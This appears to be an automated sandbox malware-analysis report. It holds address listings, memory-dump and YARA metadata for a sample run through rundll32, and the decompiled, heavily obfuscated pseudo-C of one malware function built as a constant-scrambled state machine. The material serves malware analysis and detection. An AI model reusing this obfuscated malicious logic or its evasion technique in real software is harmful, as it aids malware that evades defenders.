                                                                                                                    0x003333e8
                                                                                                                    0x003333f0
                                                                                                                    0x003333f8
                                                                                                                    0x00333403
                                                                                                                    0x0033340e
                                                                                                                    0x00333416
                                                                                                                    0x00333421
                                                                                                                    0x0033342d
                                                                                                                    0x00333430
                                                                                                                    0x00333434
                                                                                                                    0x0033343c
                                                                                                                    0x00333444
                                                                                                                    0x0033344c
                                                                                                                    0x00333454
                                                                                                                    0x00333459
                                                                                                                    0x00333461
                                                                                                                    0x00333466
                                                                                                                    0x0033346e
                                                                                                                    0x00333479
                                                                                                                    0x00333484
                                                                                                                    0x0033348f
                                                                                                                    0x0033349a
                                                                                                                    0x003334a5
                                                                                                                    0x003334ad
                                                                                                                    0x003334b8
                                                                                                                    0x003334c3
                                                                                                                    0x003334ce
                                                                                                                    0x003334d9
                                                                                                                    0x003334e4
                                                                                                                    0x003334ec
                                                                                                                    0x003334f1
                                                                                                                    0x003334f6
                                                                                                                    0x003334fe
                                                                                                                    0x00333506
                                                                                                                    0x00333511
                                                                                                                    0x0033351c
                                                                                                                    0x00333527
                                                                                                                    0x00333532
                                                                                                                    0x0033353d
                                                                                                                    0x0033354a
                                                                                                                    0x00333555
                                                                                                                    0x0033355a
                                                                                                                    0x00333565
                                                                                                                    0x0033356a
                                                                                                                    0x00333575
                                                                                                                    0x00333580
                                                                                                                    0x00333588
                                                                                                                    0x00333593
                                                                                                                    0x0033359e
                                                                                                                    0x003335a9
                                                                                                                    0x003335b4
                                                                                                                    0x003335bf
                                                                                                                    0x003335d4
                                                                                                                    0x003335d5
                                                                                                                    0x003335e0
                                                                                                                    0x003335e7
                                                                                                                    0x003335f2
                                                                                                                    0x003335fd
                                                                                                                    0x00333608
                                                                                                                    0x00333613
                                                                                                                    0x0033361e
                                                                                                                    0x00333629
                                                                                                                    0x00333634
                                                                                                                    0x0033363c
                                                                                                                    0x00333647
                                                                                                                    0x00333652
                                                                                                                    0x0033365f
                                                                                                                    0x00333668
                                                                                                                    0x0033366c
                                                                                                                    0x00333674
                                                                                                                    0x0033367c
                                                                                                                    0x00333687
                                                                                                                    0x00333692
                                                                                                                    0x0033369d
                                                                                                                    0x003336b0
                                                                                                                    0x003336b7
                                                                                                                    0x003336c2
                                                                                                                    0x003336cd
                                                                                                                    0x003336d8
                                                                                                                    0x003336e3
                                                                                                                    0x003336ee
                                                                                                                    0x003336f9
                                                                                                                    0x00333701
                                                                                                                    0x0033370c
                                                                                                                    0x00333714
                                                                                                                    0x00333722
                                                                                                                    0x00333726
                                                                                                                    0x0033372e
                                                                                                                    0x00333736
                                                                                                                    0x00333741
                                                                                                                    0x0033374c
                                                                                                                    0x00333757
                                                                                                                    0x00333757
                                                                                                                    0x00333757
                                                                                                                    0x0033375c
                                                                                                                    0x00333761
                                                                                                                    0x00333766
                                                                                                                    0x00333766
                                                                                                                    0x00333766
                                                                                                                    0x00333766
                                                                                                                    0x00333768
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033376e
                                                                                                                    0x0033392a
                                                                                                                    0x00333936
                                                                                                                    0x00333941
                                                                                                                    0x00333946
                                                                                                                    0x0033394f
                                                                                                                    0x00333951
                                                                                                                    0x0033395c
                                                                                                                    0x00333973
                                                                                                                    0x0033398c
                                                                                                                    0x00333998
                                                                                                                    0x003339b5
                                                                                                                    0x003339c3
                                                                                                                    0x003339d1
                                                                                                                    0x003339e0
                                                                                                                    0x003339fd
                                                                                                                    0x00333a1c
                                                                                                                    0x00333a23
                                                                                                                    0x00333a2f
                                                                                                                    0x00333a43
                                                                                                                    0x00333a46
                                                                                                                    0x00333a58
                                                                                                                    0x00333a5f
                                                                                                                    0x00000000
                                                                                                                    0x00333774
                                                                                                                    0x0033377a
                                                                                                                    0x00333907
                                                                                                                    0x0033391d
                                                                                                                    0x00333923
                                                                                                                    0x00333757
                                                                                                                    0x00333757
                                                                                                                    0x00333757
                                                                                                                    0x0033375c
                                                                                                                    0x00333761
                                                                                                                    0x00000000
                                                                                                                    0x00333761
                                                                                                                    0x00333780
                                                                                                                    0x00333786
                                                                                                                    0x003338fd
                                                                                                                    0x00000000
                                                                                                                    0x0033378c
                                                                                                                    0x0033378e
                                                                                                                    0x00333829
                                                                                                                    0x00333835
                                                                                                                    0x00333845
                                                                                                                    0x00333847
                                                                                                                    0x0033384b
                                                                                                                    0x0033385a
                                                                                                                    0x00333868
                                                                                                                    0x00333869
                                                                                                                    0x00333870
                                                                                                                    0x003338a5
                                                                                                                    0x003338bb
                                                                                                                    0x003338cb
                                                                                                                    0x003338d0
                                                                                                                    0x003338d3
                                                                                                                    0x003338d7
                                                                                                                    0x003338e0
                                                                                                                    0x003338d9
                                                                                                                    0x003338db
                                                                                                                    0x003338dd
                                                                                                                    0x003338dd
                                                                                                                    0x003338f2
                                                                                                                    0x00000000
                                                                                                                    0x00333794
                                                                                                                    0x00333794
                                                                                                                    0x00333796
                                                                                                                    0x0033379c
                                                                                                                    0x003337a8
                                                                                                                    0x003337b3
                                                                                                                    0x003337b9
                                                                                                                    0x003337e4
                                                                                                                    0x003337fe
                                                                                                                    0x0033381c
                                                                                                                    0x0033381f
                                                                                                                    0x00333b98
                                                                                                                    0x00333b98
                                                                                                                    0x00333b9b
                                                                                                                    0x00333b9b
                                                                                                                    0x00333ba0
                                                                                                                    0x00333ba5
                                                                                                                    0x00333baa
                                                                                                                    0x00333baa
                                                                                                                    0x00333796
                                                                                                                    0x00000000
                                                                                                                    0x0033378e
                                                                                                                    0x00333786
                                                                                                                    0x0033377a
                                                                                                                    0x00333aa7
                                                                                                                    0x00333ab1
                                                                                                                    0x00333ab1
                                                                                                                    0x00333a69
                                                                                                                    0x00333a6f
                                                                                                                    0x00333aef
                                                                                                                    0x00333afb
                                                                                                                    0x00333b03
                                                                                                                    0x00333b08
                                                                                                                    0x00333b16
                                                                                                                    0x00333b24
                                                                                                                    0x00333b3e
                                                                                                                    0x00333b68
                                                                                                                    0x00333b76
                                                                                                                    0x00333b79
                                                                                                                    0x00333b8e
                                                                                                                    0x00333b93
                                                                                                                    0x00000000
                                                                                                                    0x00333a71
                                                                                                                    0x00333a71
                                                                                                                    0x00333a73
                                                                                                                    0x00333ac7
                                                                                                                    0x00333acd
                                                                                                                    0x00333ace
                                                                                                                    0x00333ad9
                                                                                                                    0x00333add
                                                                                                                    0x00333ae2
                                                                                                                    0x00333ae4
                                                                                                                    0x00333ae7
                                                                                                                    0x00000000
                                                                                                                    0x00333a75
                                                                                                                    0x00333a75
                                                                                                                    0x00333a77
                                                                                                                    0x00000000
                                                                                                                    0x00333a7d
                                                                                                                    0x00333a7d
                                                                                                                    0x00333a9d
                                                                                                                    0x00333aa2
                                                                                                                    0x00333a77
                                                                                                                    0x00333a73
                                                                                                                    0x00000000
                                                                                                                    0x00333baf
                                                                                                                    0x00333baf
                                                                                                                    0x00000000
                                                                                                                    0x00333bbb

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: "$ $(|?|$;]z$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
                                                                                                                    • API String ID: 0-1427316221
                                                                                                                    • Opcode ID: 5415bb0c310e63ecd5831974d4a5ef955fe3d754476a32c66de457ae4e80b049
                                                                                                                    • Instruction ID: 526c3b879ea09b04c5c5d25cf0576b1aa4d24eef5b8401be86f9c5ad17f20581
                                                                                                                    • Opcode Fuzzy Hash: 5415bb0c310e63ecd5831974d4a5ef955fe3d754476a32c66de457ae4e80b049
                                                                                                                    • Instruction Fuzzy Hash: 7672EE715093818FD3B9CF25C58AB8BBBE1FBC5304F10891DE1DA9A260DBB59949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034AE6D Relevance: 19.3, Strings: 15, Instructions: 522COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E0034AE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				void* _t537;
				void* _t566;
				void* _t567;
				intOrPtr _t573;
				void* _t575;
				void* _t577;
				void* _t585;
				void* _t588;
				void* _t594;
				void* _t596;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				void* _t611;
				void* _t633;
				void* _t660;
				void* _t675;
				intOrPtr _t677;
				intOrPtr _t680;
				signed int* _t682;
				void* _t685;

				_push(_a20);
				_t677 = __edx;
				_push(_a16);
				_v24 = __edx;
				_push(0x20);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t537);
				_v8 = 0x673696;
				_t680 = 0;
				_v4 = 0;
				_t682 =  &(( &_v272)[7]);
				_v144 = 0xf00d33;
				_v144 = _v144 | 0x228e8b2e;
				_t596 = 0x1d3710;
				_v144 = _v144 >> 8;
				_v144 = _v144 ^ 0x0022fe8f;
				_v244 = 0xde08aa;
				_t603 = 0x17;
				_v244 = _v244 / _t603;
				_v244 = _v244 + 0xffff54ea;
				_v244 = _v244 << 0xa;
				_v244 = _v244 ^ 0x23f0fc00;
				_v224 = 0x36cb35;
				_v224 = _v224 | 0xc39aec51;
				_v224 = _v224 + 0x9146;
				_t604 = 0x62;
				_v224 = _v224 * 0x70;
				_v224 = _v224 ^ 0xa3c851d0;
				_v116 = 0xf2e64b;
				_v116 = _v116 << 5;
				_v116 = _v116 ^ 0x1e5cc960;
				_v248 = 0x2b7d5f;
				_t43 =  &_v248; // 0x2b7d5f
				_v248 =  *_t43 * 0x53;
				_v248 = _v248 + 0x8561;
				_v248 = _v248 | 0xae4dc352;
				_v248 = _v248 ^ 0xae5feb7e;
				_v80 = 0xe6036b;
				_v80 = _v80 * 0xb;
				_v80 = _v80 ^ 0x09e22599;
				_v240 = 0x5b8b4f;
				_v240 = _v240 + 0xffffe1e0;
				_v240 = _v240 ^ 0xb7b7812a;
				_v240 = _v240 + 0xffff41e0;
				_v240 = _v240 ^ 0xb7ec2de5;
				_v232 = 0xf81ab6;
				_v232 = _v232 ^ 0xa56b9217;
				_v232 = _v232 | 0x431a55e8;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xcdeef480;
				_v184 = 0xddfe73;
				_v184 = _v184 * 0x26;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xf3c51200;
				_v120 = 0x644fb5;
				_v120 = _v120 >> 6;
				_v120 = _v120 / _t604;
				_v120 = _v120 ^ 0x00000418;
				_v60 = 0xc6ff9f;
				_v60 = _v60 ^ 0x0d96ce7d;
				_v60 = _v60 ^ 0x0d5031e2;
				_v204 = 0xeedb74;
				_v204 = _v204 >> 0xb;
				_v204 = _v204 >> 0xa;
				_v204 = _v204 | 0xba569879;
				_v204 = _v204 ^ 0xba56987f;
				_v268 = 0x9a0618;
				_v268 = _v268 ^ 0x10270239;
				_v268 = _v268 ^ 0x733075d3;
				_t605 = 0x16;
				_v268 = _v268 / _t605;
				_v268 = _v268 ^ 0x04865c22;
				_v160 = 0x655fad;
				_v160 = _v160 >> 3;
				_v160 = _v160 >> 4;
				_v160 = _v160 ^ 0x0009a8dc;
				_v272 = 0x9202;
				_v272 = _v272 | 0xfb135803;
				_t606 = 0x41;
				_v272 = _v272 * 0x2c;
				_v272 = _v272 << 1;
				_v272 = _v272 ^ 0x4ed07035;
				_v100 = 0x536289;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xa6cd28cf;
				_v108 = 0xf021d8;
				_v108 = _v108 ^ 0x8f8b6ed2;
				_v108 = _v108 ^ 0x8f701d8c;
				_v152 = 0xcba027;
				_v152 = _v152 ^ 0xce0cd109;
				_v152 = _v152 | 0x7dfb06f6;
				_v152 = _v152 ^ 0xfff88f5e;
				_v252 = 0xf09c41;
				_v252 = _v252 + 0x8e2a;
				_v252 = _v252 << 3;
				_v252 = _v252 | 0xdb831f2c;
				_v252 = _v252 ^ 0xdf846234;
				_v260 = 0x3d692f;
				_v260 = _v260 << 2;
				_v260 = _v260 | 0xbfb4a027;
				_v260 = _v260 + 0x643;
				_v260 = _v260 ^ 0xbffb0fde;
				_v92 = 0x80bca7;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 ^ 0x00038c1c;
				_v228 = 0xbbbc43;
				_v228 = _v228 | 0x61282476;
				_v228 = _v228 + 0xffff6ee2;
				_v228 = _v228 * 0x69;
				_v228 = _v228 ^ 0x15ccd750;
				_v236 = 0xc2062f;
				_v236 = _v236 | 0xf7f3ef67;
				_v236 = _v236 * 0x5c;
				_v236 = _v236 ^ 0x1ba01eed;
				_v128 = 0xa773bc;
				_v128 = _v128 << 0x10;
				_v128 = _v128 | 0xe162daa5;
				_v128 = _v128 ^ 0xf3f36b57;
				_v136 = 0x3287f3;
				_v136 = _v136 / _t606;
				_v136 = _v136 >> 9;
				_v136 = _v136 ^ 0x000c37d1;
				_v104 = 0x8d5fef;
				_v104 = _v104 + 0xffff56ea;
				_v104 = _v104 ^ 0x008f942b;
				_v44 = 0xd6bac6;
				_v44 = _v44 * 0x7f;
				_v44 = _v44 ^ 0x6a80c639;
				_v148 = 0xa4165e;
				_v148 = _v148 * 0x13;
				_v148 = _v148 | 0x84e82f79;
				_v148 = _v148 ^ 0x8cef9599;
				_v96 = 0xfc4916;
				_v96 = _v96 + 0xffff0795;
				_v96 = _v96 ^ 0x00f5cebb;
				_v132 = 0xd5d7c2;
				_v132 = _v132 >> 0x10;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x0010cc3c;
				_v264 = 0xf6e8cb;
				_v264 = _v264 + 0x6576;
				_v264 = _v264 + 0x7b15;
				_v264 = _v264 + 0x6b9c;
				_v264 = _v264 ^ 0x00fe3ec7;
				_v208 = 0x3a8541;
				_v208 = _v208 | 0x57459f57;
				_v208 = _v208 ^ 0x66631a8c;
				_v208 = _v208 | 0x178bfabb;
				_v208 = _v208 ^ 0x379a2cb6;
				_v56 = 0x33c5e6;
				_v56 = _v56 + 0x441;
				_v56 = _v56 ^ 0x0035e6a0;
				_v172 = 0x2bd4df;
				_v172 = _v172 + 0xda1f;
				_v172 = _v172 + 0x8171;
				_v172 = _v172 ^ 0x002cd084;
				_v48 = 0x796d26;
				_v48 = _v48 + 0xffff3152;
				_v48 = _v48 ^ 0x00766b67;
				_v88 = 0xfc738c;
				_v88 = _v88 << 0xe;
				_v88 = _v88 ^ 0x1ce8da45;
				_v140 = 0x79fdd0;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 * 0x78;
				_v140 = _v140 ^ 0x000f2c53;
				_v64 = 0xd0b1f6;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x000411a2;
				_v200 = 0xaa2240;
				_v200 = _v200 | 0x35f3f2d4;
				_v200 = _v200 + 0x4147;
				_v200 = _v200 + 0xffff1702;
				_v200 = _v200 ^ 0x35f16a60;
				_v52 = 0x980f89;
				_v52 = _v52 ^ 0xc15a5b47;
				_v52 = _v52 ^ 0xc1c323e9;
				_v216 = 0xb7a8b5;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0xa2f7ad91;
				_v216 = _v216 + 0xfffff0a8;
				_v216 = _v216 ^ 0xa2ec62b8;
				_v72 = 0x73581d;
				_v72 = _v72 + 0xffffc838;
				_v72 = _v72 ^ 0x00777119;
				_v164 = 0x873053;
				_v164 = _v164 ^ 0xefe323e3;
				_v164 = _v164 | 0xd91bba05;
				_v164 = _v164 ^ 0xff705bac;
				_v40 = 0xf8d5df;
				_v40 = _v40 ^ 0x79f853d7;
				_v40 = _v40 ^ 0x79053437;
				_v192 = 0x180af0;
				_v192 = _v192 + 0xffff4c14;
				_v192 = _v192 << 8;
				_v192 = _v192 + 0x2aad;
				_v192 = _v192 ^ 0x175759c3;
				_v256 = 0x23b549;
				_v256 = _v256 + 0x5eb6;
				_v256 = _v256 | 0xffb7bbff;
				_v256 = _v256 ^ 0xffb807e9;
				_v176 = 0xc1fdd5;
				_v176 = _v176 >> 0xc;
				_v176 = _v176 | 0x5151af8d;
				_v176 = _v176 ^ 0x515c7a4b;
				_v112 = 0xec5780;
				_v112 = _v112 ^ 0x97b4c021;
				_v112 = _v112 ^ 0x9750bd7e;
				_v180 = 0x591b41;
				_v180 = _v180 + 0x207e;
				_v180 = _v180 + 0xffffc81d;
				_v180 = _v180 ^ 0x005ca8dc;
				_v68 = 0x76fd1d;
				_t675 = 0x5c52c4a;
				_v68 = _v68 | 0x9e2d4356;
				_v68 = _v68 ^ 0x9e728261;
				_v76 = 0xf22a3;
				_v76 = _v76 | 0x9c703035;
				_v76 = _v76 ^ 0x9c7b5f20;
				_v220 = 0x3decab;
				_v220 = _v220 << 8;
				_v220 = _v220 ^ 0x53082a5e;
				_v220 = _v220 >> 0xd;
				_v220 = _v220 ^ 0x0004d715;
				_v84 = 0x6eb476;
				_v84 = _v84 << 0xd;
				_v84 = _v84 ^ 0xd68135de;
				_v124 = 0x458e11;
				_v124 = _v124 | 0x336f5b57;
				_t607 = 0x43;
				_v124 = _v124 / _t607;
				_v124 = _v124 ^ 0x00c97d17;
				_v156 = 0x7cba2c;
				_t608 = 0x4b;
				_v156 = _v156 / _t608;
				_v156 = _v156 | 0x0b494d21;
				_v156 = _v156 ^ 0x0b48f5d9;
				_v36 = 0x519404;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x5195ba3f;
				_v168 = 0xf13e55;
				_v168 = _v168 | 0x95edbe5f;
				_v168 = _v168 ^ 0xd6548190;
				_v168 = _v168 ^ 0x43a3dbfd;
				_v188 = 0xdd4a71;
				_v188 = _v188 + 0xffff5bb0;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 >> 6;
				_v188 = _v188 ^ 0x000a03ec;
				_v196 = 0x58b29f;
				_t609 = 0x22;
				_v196 = _v196 / _t609;
				_v196 = _v196 + 0xffff713e;
				_v196 = _v196 + 0xffff146a;
				_v196 = _v196 ^ 0x000c9f67;
				_v212 = 0xc056c;
				_t610 = 0x45;
				_v212 = _v212 * 0x51;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 / _t610;
				_v212 = _v212 ^ 0x0007774b;
				while(1) {
					L1:
					_t566 = 0x6c6f684;
					while(1) {
						L2:
						_t611 = 0x92c3a26;
						while(1) {
							L3:
							do {
								while(1) {
									L4:
									_t685 = _t596 - _t675;
									if(_t685 > 0) {
										break;
									}
									if(_t685 == 0) {
										E00346BC6(_v124, _v32, _v156);
										_t596 = 0x4bc1ff4;
										goto L1;
									} else {
										if(_t596 == 0x1d3710) {
											_t596 = 0x6d0da1a;
											continue;
										} else {
											if(_t596 == 0x19992af) {
												_push(_t611);
												_push(_t611);
												_t573 = E00337FF2(_v16);
												__eflags = _t573;
												_v20 = _t573;
												_t660 = 0x19c2787;
												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
												_t566 = 0x6c6f684;
												_t611 = 0x92c3a26;
												continue;
											} else {
												if(_t596 == _t660) {
													_t575 = E00347B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
													_t682 =  &(_t682[0xc]);
													__eflags = _t575 - _v240;
													_t611 = 0x92c3a26;
													_t566 = 0x6c6f684;
													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
													goto L3;
												} else {
													if(_t596 == 0x489cb15) {
														_push(_v148);
														_push(_v44);
														_t577 = E0034DCF7(_v104, 0x3318b4, __eflags);
														_pop(_t633);
														__eflags = E00350B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
														E0033A8B0(_v48, _t577, _v88);
														_t677 = _v24;
														_t682 =  &(_t682[0xb]);
														L24:
														_t566 = 0x6c6f684;
														_t611 = 0x92c3a26;
														_t660 = 0x19c2787;
														goto L25;
													} else {
														if(_t596 != 0x4bc1ff4) {
															goto L25;
														} else {
															E00348519(_v36, _v168, _v20);
															_t596 = 0x87f6c1b;
															while(1) {
																L1:
																_t566 = 0x6c6f684;
																L2:
																_t611 = 0x92c3a26;
																L3:
																goto L4;
															}
														}
													}
												}
											}
										}
									}
									L28:
									return _t680;
								}
								__eflags = _t596 - _t566;
								if(_t596 == _t566) {
									_t567 = E0034828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
									_t682 =  &(_t682[6]);
									_t596 = _t675;
									__eflags = _t567 - _v60;
									_t680 =  ==  ? 1 : _t680;
									goto L24;
								} else {
									__eflags = _t596 - 0x6d0da1a;
									if(__eflags == 0) {
										_push(_v272);
										_push(_v160);
										_t585 = E0034DCF7(_v268, 0x331884, __eflags);
										_push(_v152);
										_push(_v108);
										_t588 = E00339462(_t585, _v260,  &_v28, E0034DCF7(_v100, 0x331814, __eflags), _v92, _v144);
										_t682 =  &(_t682[9]);
										__eflags = _t588 - _v244;
										_t596 =  ==  ? 0x489cb15 : 0x822e036;
										E0033A8B0(_v228, _t585, _v236);
										E0033A8B0(_v128, _t586, _v136);
										_t677 = _v24;
										_t675 = 0x5c52c4a;
										goto L24;
									} else {
										__eflags = _t596 - 0x87f6c1b;
										if(_t596 == 0x87f6c1b) {
											E0033957D(_v28, _v188, _v196, _v204, _v212);
										} else {
											__eflags = _t596 - _t611;
											if(_t596 != _t611) {
												goto L25;
											} else {
												_t594 = E0033A81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
												_t682 =  &(_t682[5]);
												__eflags = _t594 - _v184;
												_t566 = 0x6c6f684;
												_t596 =  ==  ? 0x6c6f684 : _t675;
												goto L2;
											}
										}
									}
								}
								goto L28;
								L25:
								__eflags = _t596 - 0x822e036;
							} while (__eflags != 0);
							goto L28;
						}
					}
				}
			}

































































































                                                                                                                    0x0034ae77
                                                                                                                    0x0034ae7e
                                                                                                                    0x0034ae80
                                                                                                                    0x0034ae87
                                                                                                                    0x0034ae8e
                                                                                                                    0x0034ae90
                                                                                                                    0x0034ae97
                                                                                                                    0x0034ae9e
                                                                                                                    0x0034ae9f
                                                                                                                    0x0034aea0
                                                                                                                    0x0034aea5
                                                                                                                    0x0034aeb0
                                                                                                                    0x0034aeb2
                                                                                                                    0x0034aeb9
                                                                                                                    0x0034aebc
                                                                                                                    0x0034aec9
                                                                                                                    0x0034aed4
                                                                                                                    0x0034aed9
                                                                                                                    0x0034aee1
                                                                                                                    0x0034aeec
                                                                                                                    0x0034aefa
                                                                                                                    0x0034aeff
                                                                                                                    0x0034af05
                                                                                                                    0x0034af0d
                                                                                                                    0x0034af12
                                                                                                                    0x0034af1a
                                                                                                                    0x0034af22
                                                                                                                    0x0034af2a
                                                                                                                    0x0034af37
                                                                                                                    0x0034af38
                                                                                                                    0x0034af3c
                                                                                                                    0x0034af44
                                                                                                                    0x0034af4f
                                                                                                                    0x0034af57
                                                                                                                    0x0034af62
                                                                                                                    0x0034af6a
                                                                                                                    0x0034af6f
                                                                                                                    0x0034af73
                                                                                                                    0x0034af7b
                                                                                                                    0x0034af83
                                                                                                                    0x0034af8b
                                                                                                                    0x0034af9e
                                                                                                                    0x0034afa5
                                                                                                                    0x0034afb0
                                                                                                                    0x0034afb8
                                                                                                                    0x0034afc0
                                                                                                                    0x0034afc8
                                                                                                                    0x0034afd0
                                                                                                                    0x0034afd8
                                                                                                                    0x0034afe0
                                                                                                                    0x0034afe8
                                                                                                                    0x0034aff0
                                                                                                                    0x0034aff5
                                                                                                                    0x0034affd
                                                                                                                    0x0034b00a
                                                                                                                    0x0034b00e
                                                                                                                    0x0034b013
                                                                                                                    0x0034b01b
                                                                                                                    0x0034b026
                                                                                                                    0x0034b037
                                                                                                                    0x0034b03e
                                                                                                                    0x0034b049
                                                                                                                    0x0034b054
                                                                                                                    0x0034b05f
                                                                                                                    0x0034b06a
                                                                                                                    0x0034b072
                                                                                                                    0x0034b077
                                                                                                                    0x0034b07e
                                                                                                                    0x0034b086
                                                                                                                    0x0034b08e
                                                                                                                    0x0034b096
                                                                                                                    0x0034b09e
                                                                                                                    0x0034b0ac
                                                                                                                    0x0034b0b1
                                                                                                                    0x0034b0b7
                                                                                                                    0x0034b0bf
                                                                                                                    0x0034b0ca
                                                                                                                    0x0034b0d2
                                                                                                                    0x0034b0da
                                                                                                                    0x0034b0e5
                                                                                                                    0x0034b0ed
                                                                                                                    0x0034b0fa
                                                                                                                    0x0034b0fb
                                                                                                                    0x0034b0ff
                                                                                                                    0x0034b103
                                                                                                                    0x0034b10b
                                                                                                                    0x0034b116
                                                                                                                    0x0034b11e
                                                                                                                    0x0034b129
                                                                                                                    0x0034b134
                                                                                                                    0x0034b13f
                                                                                                                    0x0034b14a
                                                                                                                    0x0034b155
                                                                                                                    0x0034b160
                                                                                                                    0x0034b16b
                                                                                                                    0x0034b176
                                                                                                                    0x0034b17e
                                                                                                                    0x0034b186
                                                                                                                    0x0034b18b
                                                                                                                    0x0034b193
                                                                                                                    0x0034b19b
                                                                                                                    0x0034b1a3
                                                                                                                    0x0034b1a8
                                                                                                                    0x0034b1b0
                                                                                                                    0x0034b1b8
                                                                                                                    0x0034b1c0
                                                                                                                    0x0034b1cb
                                                                                                                    0x0034b1d3
                                                                                                                    0x0034b1de
                                                                                                                    0x0034b1e6
                                                                                                                    0x0034b1ee
                                                                                                                    0x0034b1fb
                                                                                                                    0x0034b1ff
                                                                                                                    0x0034b207
                                                                                                                    0x0034b20f
                                                                                                                    0x0034b21c
                                                                                                                    0x0034b220
                                                                                                                    0x0034b228
                                                                                                                    0x0034b233
                                                                                                                    0x0034b23b
                                                                                                                    0x0034b246
                                                                                                                    0x0034b251
                                                                                                                    0x0034b265
                                                                                                                    0x0034b26c
                                                                                                                    0x0034b274
                                                                                                                    0x0034b27f
                                                                                                                    0x0034b28a
                                                                                                                    0x0034b295
                                                                                                                    0x0034b2a0
                                                                                                                    0x0034b2b3
                                                                                                                    0x0034b2ba
                                                                                                                    0x0034b2c5
                                                                                                                    0x0034b2d8
                                                                                                                    0x0034b2df
                                                                                                                    0x0034b2ea
                                                                                                                    0x0034b2f5
                                                                                                                    0x0034b300
                                                                                                                    0x0034b30b
                                                                                                                    0x0034b316
                                                                                                                    0x0034b321
                                                                                                                    0x0034b329
                                                                                                                    0x0034b331
                                                                                                                    0x0034b33c
                                                                                                                    0x0034b344
                                                                                                                    0x0034b34c
                                                                                                                    0x0034b354
                                                                                                                    0x0034b35c
                                                                                                                    0x0034b364
                                                                                                                    0x0034b36c
                                                                                                                    0x0034b374
                                                                                                                    0x0034b37c
                                                                                                                    0x0034b384
                                                                                                                    0x0034b38c
                                                                                                                    0x0034b397
                                                                                                                    0x0034b3a2
                                                                                                                    0x0034b3ad
                                                                                                                    0x0034b3b5
                                                                                                                    0x0034b3bd
                                                                                                                    0x0034b3c5
                                                                                                                    0x0034b3cd
                                                                                                                    0x0034b3d8
                                                                                                                    0x0034b3e3
                                                                                                                    0x0034b3ee
                                                                                                                    0x0034b3f9
                                                                                                                    0x0034b401
                                                                                                                    0x0034b40c
                                                                                                                    0x0034b417
                                                                                                                    0x0034b427
                                                                                                                    0x0034b42e
                                                                                                                    0x0034b439
                                                                                                                    0x0034b444
                                                                                                                    0x0034b44c
                                                                                                                    0x0034b457
                                                                                                                    0x0034b45f
                                                                                                                    0x0034b467
                                                                                                                    0x0034b46f
                                                                                                                    0x0034b477
                                                                                                                    0x0034b47f
                                                                                                                    0x0034b48a
                                                                                                                    0x0034b495
                                                                                                                    0x0034b4a0
                                                                                                                    0x0034b4a8
                                                                                                                    0x0034b4ad
                                                                                                                    0x0034b4b5
                                                                                                                    0x0034b4bd
                                                                                                                    0x0034b4c5
                                                                                                                    0x0034b4d0
                                                                                                                    0x0034b4db
                                                                                                                    0x0034b4e6
                                                                                                                    0x0034b4ee
                                                                                                                    0x0034b4f6
                                                                                                                    0x0034b4fe
                                                                                                                    0x0034b506
                                                                                                                    0x0034b511
